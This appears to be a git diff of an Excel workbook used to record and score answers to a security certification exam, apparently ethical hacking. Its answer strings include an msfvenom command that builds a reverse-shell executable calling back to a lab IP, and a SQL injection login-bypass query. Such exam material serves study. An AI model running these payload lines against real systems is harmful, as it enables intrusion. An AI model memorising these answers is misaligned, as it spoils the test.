     <row r="43" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A43" s="1">
         <v>42</v>
       </c>
+      <c r="B43" t="s">
+        <v>402</v>
+      </c>
       <c r="D43" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="44" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A44" s="1">
         <v>43</v>
       </c>
+      <c r="B44" t="s">
+        <v>403</v>
+      </c>
       <c r="D44" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="45" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A45" s="1">
         <v>44</v>
       </c>
+      <c r="B45" t="s">
+        <v>404</v>
+      </c>
       <c r="D45" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="46" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A46" s="1">
         <v>45</v>
       </c>
+      <c r="B46" t="s">
+        <v>405</v>
+      </c>
       <c r="D46" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="47" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A47" s="1">
         <v>46</v>
       </c>
+      <c r="B47" t="s">
+        <v>406</v>
+      </c>
       <c r="D47" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="48" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A48" s="1">
         <v>47</v>
       </c>
+      <c r="B48" t="s">
+        <v>407</v>
+      </c>
       <c r="D48" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="49" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A49" s="1">
         <v>48</v>
       </c>
+      <c r="B49" t="s">
+        <v>408</v>
+      </c>
       <c r="D49" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="50" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A50" s="1">
         <v>49</v>
       </c>
+      <c r="B50" t="s">
+        <v>409</v>
+      </c>
       <c r="D50" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="51" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A51" s="1">
         <v>50</v>
       </c>
+      <c r="B51" t="s">
+        <v>410</v>
+      </c>
       <c r="D51" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="52" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A52" s="1">
         <v>51</v>
       </c>
+      <c r="B52" t="s">
+        <v>411</v>
+      </c>
       <c r="D52" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="53" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A53" s="1">
         <v>52</v>
       </c>
+      <c r="B53" t="s">
+        <v>412</v>
+      </c>
       <c r="D53" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="54" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A54" s="1">
         <v>53</v>
       </c>
+      <c r="B54" t="s">
+        <v>413</v>
+      </c>
       <c r="D54" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="55" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A55" s="1">
         <v>54</v>
       </c>
+      <c r="B55" t="s">
+        <v>414</v>
+      </c>
       <c r="D55" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="56" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A56" s="1">
         <v>55</v>
       </c>
+      <c r="B56" t="s">
+        <v>415</v>
+      </c>
       <c r="D56" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="57" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A57" s="1">
         <v>56</v>
       </c>
+      <c r="B57" t="s">
+        <v>416</v>
+      </c>
       <c r="D57" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="58" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A58" s="1">
         <v>57</v>
       </c>
+      <c r="B58" t="s">
+        <v>417</v>
+      </c>
       <c r="D58" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="59" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A59" s="1">
         <v>58</v>
       </c>
+      <c r="B59" t="s">
+        <v>418</v>
+      </c>
       <c r="D59" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="60" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A60" s="1">
         <v>59</v>
       </c>
+      <c r="B60" t="s">
+        <v>419</v>
+      </c>
       <c r="D60" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="61" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A61" s="1">
         <v>60</v>
       </c>
+      <c r="B61" t="s">
+        <v>420</v>
+      </c>
       <c r="D61" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="62" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A62" s="1">
         <v>61</v>
       </c>
+      <c r="B62" t="s">
+        <v>421</v>
+      </c>
       <c r="D62" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="63" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A63" s="1">
         <v>62</v>
       </c>
+      <c r="B63" t="s">
+        <v>422</v>
+      </c>
       <c r="D63" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="64" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A64" s="1">
         <v>63</v>
       </c>
+      <c r="B64" t="s">
+        <v>423</v>
+      </c>
       <c r="D64" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="65" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A65" s="1">
         <v>64</v>
       </c>
+      <c r="B65" t="s">
+        <v>424</v>
+      </c>
       <c r="D65" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="66" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A66" s="1">
         <v>65</v>
       </c>
+      <c r="B66" t="s">
+        <v>425</v>
+      </c>
       <c r="D66" t="b">
         <f t="shared" si="0"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="67" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A67" s="1">
         <v>66</v>
       </c>
+      <c r="B67" t="s">
+        <v>426</v>
+      </c>
       <c r="D67" t="b">
-        <f t="shared" ref="D67:D126" si="1">IF(B67=C67,TRUE,FALSE)</f>
-        <v>1</v>
+        <f t="shared" ref="D67:D101" si="1">IF(B67=C67,TRUE,FALSE)</f>
+        <v>0</v>
       </c>
     </row>
     <row r="68" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A68" s="1">
         <v>67</v>
       </c>
+      <c r="B68" t="s">
+        <v>427</v>
+      </c>
       <c r="D68" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="69" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A69" s="1">
         <v>68</v>
       </c>
+      <c r="B69" t="s">
+        <v>428</v>
+      </c>
       <c r="D69" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="70" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A70" s="1">
         <v>69</v>
       </c>
+      <c r="B70" t="s">
+        <v>429</v>
+      </c>
       <c r="D70" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="71" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A71" s="1">
         <v>70</v>
       </c>
+      <c r="B71" t="s">
+        <v>166</v>
+      </c>
       <c r="D71" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="72" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A72" s="1">
         <v>71</v>
       </c>
+      <c r="B72" t="s">
+        <v>430</v>
+      </c>
       <c r="D72" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="73" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A73" s="1">
         <v>72</v>
       </c>
+      <c r="B73" t="s">
+        <v>431</v>
+      </c>
       <c r="D73" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="74" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A74" s="1">
         <v>73</v>
       </c>
+      <c r="B74" t="s">
+        <v>432</v>
+      </c>
       <c r="D74" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="75" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A75" s="1">
         <v>74</v>
       </c>
+      <c r="B75" t="s">
+        <v>433</v>
+      </c>
       <c r="D75" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="76" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A76" s="1">
         <v>75</v>
       </c>
+      <c r="B76" t="s">
+        <v>374</v>
+      </c>
       <c r="D76" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="77" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A77" s="1">
         <v>76</v>
       </c>
+      <c r="B77" t="s">
+        <v>434</v>
+      </c>
       <c r="D77" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="78" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A78" s="1">
         <v>77</v>
       </c>
+      <c r="B78" t="s">
+        <v>435</v>
+      </c>
       <c r="D78" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="79" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A79" s="1">
         <v>78</v>
       </c>
+      <c r="B79" t="s">
+        <v>436</v>
+      </c>
       <c r="D79" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="80" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A80" s="1">
         <v>79</v>
       </c>
+      <c r="B80" t="s">
+        <v>437</v>
+      </c>
       <c r="D80" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="81" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A81" s="1">
         <v>80</v>
       </c>
+      <c r="B81" t="s">
+        <v>438</v>
+      </c>
       <c r="D81" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="82" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A82" s="1">
         <v>81</v>
       </c>
+      <c r="B82" t="s">
+        <v>439</v>
+      </c>
       <c r="D82" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="83" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A83" s="1">
         <v>82</v>
       </c>
+      <c r="B83" t="s">
+        <v>440</v>
+      </c>
       <c r="D83" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="84" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A84" s="1">
         <v>83</v>
       </c>
+      <c r="B84" t="s">
+        <v>133</v>
+      </c>
       <c r="D84" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="85" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A85" s="1">
         <v>84</v>
       </c>
+      <c r="B85" t="s">
+        <v>441</v>
+      </c>
       <c r="D85" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="86" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A86" s="1">
         <v>85</v>
       </c>
+      <c r="B86" t="s">
+        <v>212</v>
+      </c>
       <c r="D86" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="87" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A87" s="1">
         <v>86</v>
       </c>
+      <c r="B87" t="s">
+        <v>442</v>
+      </c>
       <c r="D87" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="88" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A88" s="1">
         <v>87</v>
       </c>
+      <c r="B88" t="s">
+        <v>443</v>
+      </c>
       <c r="D88" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="89" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A89" s="1">
         <v>88</v>
       </c>
+      <c r="B89" t="s">
+        <v>444</v>
+      </c>
       <c r="D89" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="90" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A90" s="1">
         <v>89</v>
       </c>
+      <c r="B90" t="s">
+        <v>445</v>
+      </c>
       <c r="D90" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="91" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A91" s="1">
         <v>90</v>
       </c>
+      <c r="B91" t="s">
+        <v>446</v>
+      </c>
       <c r="D91" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="92" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A92" s="1">
         <v>91</v>
       </c>
+      <c r="B92" t="s">
+        <v>447</v>
+      </c>
       <c r="D92" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="93" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A93" s="1">
         <v>92</v>
       </c>
+      <c r="B93" t="s">
+        <v>448</v>
+      </c>
       <c r="D93" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="94" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A94" s="1">
         <v>93</v>
       </c>
+      <c r="B94" t="s">
+        <v>449</v>
+      </c>
       <c r="D94" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="95" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A95" s="1">
         <v>94</v>
       </c>
+      <c r="B95" t="s">
+        <v>450</v>
+      </c>
       <c r="D95" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
       </c>
     </row>
     <row r="96" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A96" s="1">
         <v>95</v>
       </c>
+      <c r="B96" t="s">
+        <v>451</v>
+      </c>
       <c r="D96" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="97" spans="1:4" x14ac:dyDescent="0.25">
+        <v>0</v>
+      </c>
+    </row>
+    <row r="97" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A97" s="1">
         <v>96</v>
       </c>
+      <c r="B97" t="s">
+        <v>452</v>
+      </c>
       <c r="D97" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="98" spans="1:4" x14ac:dyDescent="0.25">
+        <v>0</v>
+      </c>
+    </row>
+    <row r="98" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A98" s="1">
         <v>97</v>
       </c>
+      <c r="B98" t="s">
+        <v>453</v>
+      </c>
       <c r="D98" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="99" spans="1:4" x14ac:dyDescent="0.25">
+        <v>0</v>
+      </c>
+    </row>
+    <row r="99" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A99" s="1">
         <v>98</v>
       </c>
+      <c r="B99" t="s">
+        <v>454</v>
+      </c>
       <c r="D99" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="100" spans="1:4" x14ac:dyDescent="0.25">
+        <v>0</v>
+      </c>
+    </row>
+    <row r="100" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A100" s="1">
         <v>99</v>
       </c>
+      <c r="B100" t="s">
+        <v>31</v>
+      </c>
       <c r="D100" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="101" spans="1:4" x14ac:dyDescent="0.25">
+        <v>0</v>
+      </c>
+    </row>
+    <row r="101" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A101" s="1">
         <v>100</v>
       </c>
+      <c r="B101" t="s">
+        <v>455</v>
+      </c>
       <c r="D101" t="b">
         <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="102" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A102" s="1">
-        <v>101</v>
-      </c>
-      <c r="D102" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="103" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A103" s="1">
-        <v>102</v>
-      </c>
-      <c r="D103" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="104" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A104" s="1">
-        <v>103</v>
-      </c>
-      <c r="D104" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="105" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A105" s="1">
-        <v>104</v>
-      </c>
-      <c r="D105" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="106" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A106" s="1">
-        <v>105</v>
-      </c>
-      <c r="D106" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="107" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A107" s="1">
-        <v>106</v>
-      </c>
-      <c r="D107" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="108" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A108" s="1">
-        <v>107</v>
-      </c>
-      <c r="D108" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="109" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A109" s="1">
-        <v>108</v>
-      </c>
-      <c r="D109" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="110" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A110" s="1">
-        <v>109</v>
-      </c>
-      <c r="D110" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="111" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A111" s="1">
-        <v>110</v>
-      </c>
-      <c r="D111" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="112" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A112" s="1">
-        <v>111</v>
-      </c>
-      <c r="D112" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="113" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A113" s="1">
-        <v>112</v>
-      </c>
-      <c r="D113" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="114" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A114" s="1">
-        <v>113</v>
-      </c>
-      <c r="D114" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="115" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A115" s="1">
-        <v>114</v>
-      </c>
-      <c r="D115" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="116" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A116" s="1">
-        <v>115</v>
-      </c>
-      <c r="D116" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="117" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A117" s="1">
-        <v>116</v>
-      </c>
-      <c r="D117" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="118" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A118" s="1">
-        <v>117</v>
-      </c>
-      <c r="D118" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="119" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A119" s="1">
-        <v>118</v>
-      </c>
-      <c r="D119" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="120" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A120" s="1">
-        <v>119</v>
-      </c>
-      <c r="D120" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="121" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A121" s="1">
-        <v>120</v>
-      </c>
-      <c r="D121" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="122" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A122" s="1">
-        <v>121</v>
-      </c>
-      <c r="D122" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="123" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A123" s="1">
-        <v>122</v>
-      </c>
-      <c r="D123" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="124" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A124" s="1">
-        <v>123</v>
-      </c>
-      <c r="D124" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="125" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A125" s="1">
-        <v>124</v>
-      </c>
-      <c r="D125" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
-      </c>
-    </row>
-    <row r="126" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A126" s="1">
-        <v>125</v>
-      </c>
-      <c r="D126" t="b">
-        <f t="shared" si="1"/>
-        <v>1</v>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="102" spans="1:7" x14ac:dyDescent="0.25">
+      <c r="D102">
+        <f>COUNTIF(D2:D101,TRUE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="104" spans="1:7" x14ac:dyDescent="0.25">
+      <c r="F104" t="s">
+        <v>456</v>
+      </c>
+      <c r="G104">
+        <f>SUM(D102)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="105" spans="1:7" x14ac:dyDescent="0.25">
+      <c r="F105" t="s">
+        <v>457</v>
+      </c>
+      <c r="G105">
+        <f>SUM(G104/125*100)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="107" spans="1:7" x14ac:dyDescent="0.25">
+      <c r="F107" t="s">
+        <v>458</v>
+      </c>
+      <c r="G107" t="str">
+        <f>IF(G104&gt;=92,"PASS","FAIL")</f>
+        <v>FAIL</v>
       </c>
     </row>
   </sheetData>

--- a/Exam excel.xlsx
+++ b/Exam excel.xlsx
@@ -8,15 +8,16 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\stratumhr\Downloads\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4A26BA3A-1DC5-4977-9770-743A646E11FF}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{04AA0D38-24D2-48E7-A7C4-07E203ACEA1F}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="4" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="1" sheetId="1" r:id="rId1"/>
     <sheet name="2" sheetId="5" r:id="rId2"/>
     <sheet name="3" sheetId="4" r:id="rId3"/>
     <sheet name="4" sheetId="2" r:id="rId4"/>
+    <sheet name="5" sheetId="7" r:id="rId5"/>
   </sheets>
   <calcPr calcId="191029"/>
   <extLst>
@@ -28,7 +29,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="495" uniqueCount="464">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="690" uniqueCount="503">
   <si>
     <t>Slno</t>
   </si>
@@ -1420,6 +1421,123 @@
   </si>
   <si>
     <t>percent</t>
+  </si>
+  <si>
+    <t>4.0 6.9</t>
+  </si>
+  <si>
+    <t>filetype</t>
+  </si>
+  <si>
+    <t>Variation</t>
+  </si>
+  <si>
+    <t>SaaS</t>
+  </si>
+  <si>
+    <t>File-less malware</t>
+  </si>
+  <si>
+    <t>Encryption virus</t>
+  </si>
+  <si>
+    <t>Port 53</t>
+  </si>
+  <si>
+    <t>SOX</t>
+  </si>
+  <si>
+    <t>Impersonation</t>
+  </si>
+  <si>
+    <t>Limit the administrator or root-level access to the minimum number of users</t>
+  </si>
+  <si>
+    <t>Use netstat and check for outgoing connections to strange IP addresses or domains.</t>
+  </si>
+  <si>
+    <t>Use netstat and check for outgoing connections to strange IP addresses or domains</t>
+  </si>
+  <si>
+    <t>Dorian is signing the message with his private key, and Poly will verify that the message came from</t>
+  </si>
+  <si>
+    <t>wget https://site.com | grep "&lt; a href=\"http" | grep "site.com"</t>
+  </si>
+  <si>
+    <t>nmap sn PS &lt; target IP address &gt;</t>
+  </si>
+  <si>
+    <t>Session donation attack</t>
+  </si>
+  <si>
+    <t>Agent-based scanner</t>
+  </si>
+  <si>
+    <t>Triple Data Encryption Standard</t>
+  </si>
+  <si>
+    <t>Buffer overflow</t>
+  </si>
+  <si>
+    <t>Evil twin</t>
+  </si>
+  <si>
+    <t>ClickJacking Attack</t>
+  </si>
+  <si>
+    <t>Dictionary</t>
+  </si>
+  <si>
+    <t>use marys public key to encrypt the message</t>
+  </si>
+  <si>
+    <t>Wireless network assessment</t>
+  </si>
+  <si>
+    <t>bryans public key, Alice public key</t>
+  </si>
+  <si>
+    <t>The -g flag</t>
+  </si>
+  <si>
+    <t>KRACK</t>
+  </si>
+  <si>
+    <t>select * from Users where UserName = 'attack' or 1=1 --' and UserPassword = '123456'</t>
+  </si>
+  <si>
+    <t>It is a stateful firewall.</t>
+  </si>
+  <si>
+    <t>DNS tunneling method</t>
+  </si>
+  <si>
+    <t>Twofish encryption algorithm</t>
+  </si>
+  <si>
+    <t>True positive</t>
+  </si>
+  <si>
+    <t>HIPPA/PHI</t>
+  </si>
+  <si>
+    <t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe &gt; shell.exe</t>
+  </si>
+  <si>
+    <t>Matt inadvertently provided the answers to his security questions when responding to the post.</t>
+  </si>
+  <si>
+    <t xml:space="preserve">the php file silently executes the code and grabs the users session cookies and session id </t>
+  </si>
+  <si>
+    <t>The attacker forges a reply from the DNS resolver.</t>
+  </si>
+  <si>
+    <t>Server-side request forgery (SSRF) attack</t>
+  </si>
+  <si>
+    <t>Dark web footprinting</t>
   </si>
 </sst>
 </file>
@@ -1758,7 +1876,7 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
   <dimension ref="A1:G131"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A121" workbookViewId="0">
+    <sheetView topLeftCell="A121" workbookViewId="0">
       <selection activeCell="F138" sqref="F138"/>
     </sheetView>
   </sheetViews>
@@ -6445,8 +6563,8 @@
